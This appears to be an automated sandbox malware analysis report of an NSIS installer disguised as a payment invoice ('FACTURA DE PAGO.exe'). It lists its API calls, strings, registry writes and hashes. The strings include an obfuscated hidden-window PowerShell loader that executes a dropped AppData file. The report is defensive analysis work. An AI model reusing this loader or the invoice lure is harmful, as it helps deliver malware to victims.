GetModuleFileNameA.KERNELBASE(00000000,C:\Users\user\Desktop\FACTURA DE PAGO.exe,00000400), ref: 00402C93

Part of subcall function 004059A2: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\FACTURA DE PAGO.exe,80000000,00000003), ref: 004059A6
Part of subcall function 004059A2: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8

GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\FACTURA DE PAGO.exe,C:\Users\user\Desktop\FACTURA DE PAGO.exe,80000000,00000003), ref: 00402CDF

Strings

soft, xrefs: 00402D54
Inst, xrefs: 00402D4B
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E3E
Null, xrefs: 00402D5D
C:\Users\user\AppData\Local\Temp\, xrefs: 00402C6D
C:\Users\user\Desktop\FACTURA DE PAGO.exe, xrefs: 00402C7D, 00402C8C, 00402CA0, 00402CC0
C:\Users\user\Desktop, xrefs: 00402CC1, 00402CC6, 00402CCC
Error launching installer, xrefs: 00402CB6
"C:\Users\user\Desktop\FACTURA DE PAGO.exe", xrefs: 00402C66

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\FACTURA DE PAGO.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\FACTURA DE PAGO.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 4283519449-1813466821
Opcode ID: 5f7c5d9e77a9b9c73338c6d1e92cd20f3f30bb0dbb8c708eeee72798782a561c
Instruction ID: 2dd8a40a4a6da4a25a7ff80ffc2ca296f3ca1cc65932c4217ff60142993c7b59
Opcode Fuzzy Hash: 5f7c5d9e77a9b9c73338c6d1e92cd20f3f30bb0dbb8c708eeee72798782a561c
Instruction Fuzzy Hash: 9651F771940214ABDF20AF65DE89B9E7AA8EF04714F54803BF504B72D2C7BC9D418BAD

Function 00401751 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatA.KERNEL32(00000000,00000000,"powershell.exe" -windowstyle hidden "$fkale=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Udlaanslofterne\Incuss.Pen';$Humongous=$fkale.SubString(4177,3);.$Humongous($fkale)",C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kinna,00000000,00000000,00000031), ref: 00401790
CompareFileTime.KERNEL32(-00000014,?,"powershell.exe" -windowstyle hidden "$fkale=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Udlaanslofterne\Incuss.Pen';$Humongous=$fkale.SubString(4177,3);.$Humongous($fkale)","powershell.exe" -windowstyle hidden "$fkale=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Udlaanslofterne\Incuss.Pen';$Humongous=$fkale.SubString(4177,3);.$Humongous($fkale)",00000000,00000000,"powershell.exe" -windowstyle hidden "$fkale=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Udlaanslofterne\Incuss.Pen';$Humongous=$fkale.SubString(4177,3);.$Humongous($fkale)",C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kinna,00000000,00000000,00000031), ref: 004017BA

Part of subcall function 00405D2F: lstrcpynA.KERNEL32(?,?,00000400,004031BD,Trehagen Setup,NSIS Error), ref: 00405D3C

Part of subcall function 00404F48: lstrlenA.KERNEL32(00429048,00000000,0041C205,74DF23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,00429048,00000000,0041C205,74DF23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
Part of subcall function 00404F48: lstrcatA.KERNEL32(00429048,00402FFA,00402FFA,00429048,00000000,0041C205,74DF23A0), ref: 00404FA4
Part of subcall function 00404F48: SetWindowTextA.USER32(00429048,00429048), ref: 00404FB6
Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004

Strings

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kinna, xrefs: 0040177E
"powershell.exe" -windowstyle hidden "$fkale=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Udlaanslofterne\Incuss.Pen';$Humongous=$fkale.SubString(4177,3);.$Humongous($fkale)", xrefs: 0040176D, 00401776, 00401783, 00401795, 004017A6, 004017DC, 004017F2, 00401810, 00401850, 004018D1, 004018DA, 004018E4, 004018EF
C:\Users\user\AppData\Local\Temp\Vedlgges.Fam, xrefs: 0040181E, 0040183A
Arabisation\argumenta\dekaderne, xrefs: 0040179B, 0040180A, 00401828

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: "powershell.exe" -windowstyle hidden "$fkale=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Udlaanslofterne\Incuss.Pen';$Humongous=$fkale.SubString(4177,3);.$Humongous($fkale)"$Arabisation\argumenta\dekaderne$C:\Users\user\AppData\Local\Temp\Vedlgges.Fam$C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kinna
API String ID: 1941528284-2025177743
Opcode ID: 4f9644c0113f451ee2cb14cf97c87bd5b67e16b7d88c3abb121216c9f25fe8f5
Instruction ID: 9fffb686f64fba45267de9fcbed8a5438fb589d34f2a074259106400a528bed4
Opcode Fuzzy Hash: 4f9644c0113f451ee2cb14cf97c87bd5b67e16b7d88c3abb121216c9f25fe8f5
Instruction Fuzzy Hash: 1041B831900519BBDF107BA5DC85EAF3679DF45368B60863BF121F11E1D63C8A418A6D

Function 00402E9F Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402F06
GetTickCount.KERNEL32 ref: 00402FAD
MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402FD6
wsprintfA.USER32 ref: 00402FE6

Strings

DA, xrefs: 00402F5C
DA, xrefs: 00403060
... %d%%, xrefs: 00402FE0
DwA, xrefs: 00402F73, 00402F85

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: DA$ DA$... %d%%$DwA
API String ID: 551687249-506594815
Opcode ID: 3c1c6048edc1f00d8c5e0ea3695652e11966b85d101879319fc20926b17e4e8a
Instruction ID: 91ee06cea14faca46f7a5a314d1b96781db6e884ff6161e1c143c8ea96f9570f
Opcode Fuzzy Hash: 3c1c6048edc1f00d8c5e0ea3695652e11966b85d101879319fc20926b17e4e8a
Instruction Fuzzy Hash: FB51907190120A9BDB10DF65EA44B9F7BB8EF44756F10813BE800B72C4D7788E51DBAA

Function 0040540E Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405451
GetLastError.KERNEL32 ref: 00405465
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 0040547A
GetLastError.KERNEL32 ref: 00405484

Strings

ts@, xrefs: 00405414
C:\Users\user\AppData\Local\Temp\, xrefs: 00405434
C:\Users\user\Desktop, xrefs: 0040540E
ds@, xrefs: 00405443

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
API String ID: 3449924974-3946084282
Opcode ID: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
Instruction ID: 7d6f839e8d8492d35463ff02b487d6c5a8d89e3dbffb35ab490880a12e6152a5
Opcode Fuzzy Hash: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
Instruction Fuzzy Hash: B4010871D14259EADF11DBA0C9447EFBFB8EB14355F004176E905B6280E378A644CFAA

Function 0040605A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406071
wsprintfA.USER32 ref: 004060AA
LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004060BE

Strings

%s%s.dll, xrefs: 004060A4
UXTHEME, xrefs: 00406063
\, xrefs: 00406082

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
Instruction ID: e3f146f71c0a6e9640e358317deb724d3a5625ccb5f8d81b259ee964bec3998a
Opcode Fuzzy Hash: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
Instruction Fuzzy Hash: D0F0FC3095010566DB14DB74DD0DFEB375CAB08305F14017AA647E11D1D974F9248B69

Function 00402364 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023A2
lstrlenA.KERNEL32(Arabisation\argumenta\dekaderne,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C2
RegSetValueExA.ADVAPI32(?,?,?,?,Arabisation\argumenta\dekaderne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023FB
RegCloseKey.ADVAPI32(?,?,?,Arabisation\argumenta\dekaderne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8

Strings

Arabisation\argumenta\dekaderne, xrefs: 004023B3, 004023D5, 004023E5, 004023F0

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: Arabisation\argumenta\dekaderne
API String ID: 1356686001-2217045471
Opcode ID: af2b45bfcb0136edb290ca19ee121481d5b6a55bc37b0262ae4d3dbc08afb77b
Instruction ID: f509f4240a3e10e7eaa3df5a693eb391f4e90e3bb863c7dbc5285fb3648b227d
Opcode Fuzzy Hash: af2b45bfcb0136edb290ca19ee121481d5b6a55bc37b0262ae4d3dbc08afb77b
Instruction Fuzzy Hash: 6B117571E00108BFEB10EBA5DE89EAF767DEB54358F10403AF605B71D1D6B85D419B28

Function 004059D1 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004059E5
GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004059FF

Strings

nsa, xrefs: 004059DC
C:\Users\user\AppData\Local\Temp\, xrefs: 004059D4
"C:\Users\user\Desktop\FACTURA DE PAGO.exe", xrefs: 004059D1

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\FACTURA DE PAGO.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-2396142748
Opcode ID: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
Instruction ID: dd1ff100f75867a5ea1a308fa9af71207a38e4cfd515e0737c49d63577dfb4aa
Opcode Fuzzy Hash: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
Instruction Fuzzy Hash: D0F0E2327082047BDB109F15EC04B9B7B9CDFD1720F10C037FA04EA1C0D2B198448B98

Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76
windowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C42

Strings

!, xrefs: 00401BFE

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 22b2b84ea6fcd6b14ed9c5c60211004c3ca56765c3c02eadf23789df00b13e66
Instruction ID: 4a41e99441af98314081ed165e1285c49616552a54b2ccacd5bb7637226e5887
Opcode Fuzzy Hash: 22b2b84ea6fcd6b14ed9c5c60211004c3ca56765c3c02eadf23789df00b13e66
Instruction Fuzzy Hash: 76216271A44108BFEB12AFB0C94AAAD7B75DB44308F14807EF541B61D1D6B885419B29

Function 00401F90 Relevance: 6.1, APIs: 4, Instructions: 73
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401FBB

Part of subcall function 00404F48: lstrlenA.KERNEL32(00429048,00000000,0041C205,74DF23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,00429048,00000000,0041C205,74DF23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
Part of subcall function 00404F48: lstrcatA.KERNEL32(00429048,00402FFA,00402FFA,00429048,00000000,0041C205,74DF23A0), ref: 00404FA4
Part of subcall function 00404F48: SetWindowTextA.USER32(00429048,00429048), ref: 00404FB6
Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004

LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FCB
GetProcAddress.KERNEL32(00000000,?), ref: 00401FDB
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402045

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID:
API String ID: 2987980305-0
Opcode ID: c898cda39f6fe508cb32d8ec84f6dafc54057451f4acf75246eee6ddcced1586
Instruction ID: 2138191ccfc75e686ed6e38fe7ddd30e16a5f0053d2c4fe6557c99b01bfc6870
Opcode Fuzzy Hash: c898cda39f6fe508cb32d8ec84f6dafc54057451f4acf75246eee6ddcced1586
Instruction Fuzzy Hash: 58212B72904211EBDF217F658E4CAAE3671AB45318F30423BF701B62D0D7BC4946D66E

Function 004015B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

Part of subcall function 0040583A: CharNextA.USER32(?,?,0042AC70,?,004058A6,0042AC70,0042AC70,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405848
Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 0040584D
Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 00405861

GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605

Part of subcall function 0040540E: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405451

SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kinna,00000000,00000000,000000F0), ref: 00401634

Strings

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kinna, xrefs: 00401629

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kinna
API String ID: 1892508949-4293336683
Opcode ID: e0a1c47591656d94ff2a999c71ce0e1ab37baa92c7ea8d4027b9740f46afb8e4
Instruction ID: add3044d5edc1dd1b42d505c238b4ff4158083b6ff7b93d5c81ca089004ad06d
Opcode Fuzzy Hash: e0a1c47591656d94ff2a999c71ce0e1ab37baa92c7ea8d4027b9740f46afb8e4
Instruction Fuzzy Hash: C7112736504141ABEF217B650C415BF37B4EAA6325738463FE592B22E2C63C4943A63F

Function 00404EBC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00404EEB
CallWindowProcA.USER32(?,?,?,?), ref: 00404F3C

Part of subcall function 00403F60: SendMessageA.USER32(0001048A,00000000,00000000,00000000), ref: 00403F72

Strings

, xrefs: 00404ECC

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
